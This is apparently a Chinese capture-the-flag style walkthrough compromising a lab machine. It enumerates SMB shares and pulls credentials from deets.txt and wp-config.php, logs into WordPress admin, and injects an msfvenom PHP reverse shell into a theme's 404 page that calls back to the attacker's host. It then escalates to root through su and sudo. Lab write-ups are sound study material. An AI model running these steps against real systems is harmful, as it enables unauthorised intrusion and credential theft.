kali:192.168.223.131
target:192.168.223.168
通过arp-scan扫出ip为192.168.223.168,再通过nmap扫描
nmap -sV 192.168.223.168
通过nmap扫描,发现开放22、80,其中139和445都是Samba服务器,3306是MysqL和6667端口
使用smbclient尝试连接
smbclient -L 192.168.223.168
发现没有密码,有print$、share$、IPC$,尝试连接share$
smbclient '\\192.168.223.168\share$'
直接Enter发现直接进去了,无密码
看一下里面的deets.txt文件
get deets.txt
开一个新终端打开deets.txt,里面找到密码为12345
通过观察smb服务器发现有wordpress,推测是网站目录,进入wordpress后找到wordpress的配置文件
get wp-config.php
在新的终端打开该文件,为数据库的连接文件,找到账号密码为Admin和TogieMysqL12345^^
到这里没什么头绪了,对网站进行目录扫描
dirb http://192.168.223.168
扫出wordpress/wp-admin,尝试用上面获得的账号密码进行登陆,进入后台,在Appearance的Editor里面,发现可以编辑PHP文件
通过msf生成PHP木马,将其复制到对方的404页面的PHP文件中
msfvenom -p PHP/meterpreter/reverse_tcp lhost=192.168.223.131 lport=4444 -f raw > /shell.PHP
打开监听
msfconsole
use exploit/multi/handler
set payload PHP/meterpreter/reverse_tcp
set lhost 192.168.223.131
set lport 4444
exploit
找到404页面,通过安装CMS获得地址,并运行,此时目标上线
192.168.223.168/wordpress/wp-content/themes/twentyfifteen/404.PHP
美化一下界面并看一下用户有哪些
python -c 'import pty;pty.spawn("/bin/bash")'
cat /etc/passwd
找到有一个叫togie的用户,在home目录下,根据之前的deets.txt中获得密码进行提权
su togie
//12345
查看用户权限发现是三个ALL,直接提权至root
sudo -l
sudo su
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。
